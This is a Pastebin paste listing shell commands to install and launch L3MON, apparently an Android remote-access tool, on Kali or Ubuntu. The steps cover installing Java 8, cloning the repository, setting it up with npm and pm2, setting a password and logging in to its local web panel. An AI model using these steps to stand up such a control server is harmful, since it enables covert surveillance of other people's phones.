Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Commands to install L3mon are:
- JAVA8 IN KALI OR UBUNTU
- sudo tar -xf jdk-8u341-linux-x64.tar.gz -C /opt/
- sudo update-alternatives --install "/usr/bin/java" "java" "/opt/jdk1.8.0_341/bin/java" 1
- sudo update-alternatives --config java
- java -version
- # Note never use any tool after sudo su or from root user
- git clone https://github.com/efxtv/L3MON.git
- cd L3MON
- sudo npm install pm2 -g
- npm install
- npm audit fix
- npm audit
- pm2 start index.js
- pm2 stop index.js
- ls #check maindb.json file generated or not if not follow the process provided Here
- (https://github.com/efxtv/L3MON)nano maindb.json #to setup password
- pm2 start index.js
- Login
- http://127.0.0.1:22533
Advertisement
Add Comment
Please, Sign In to add comment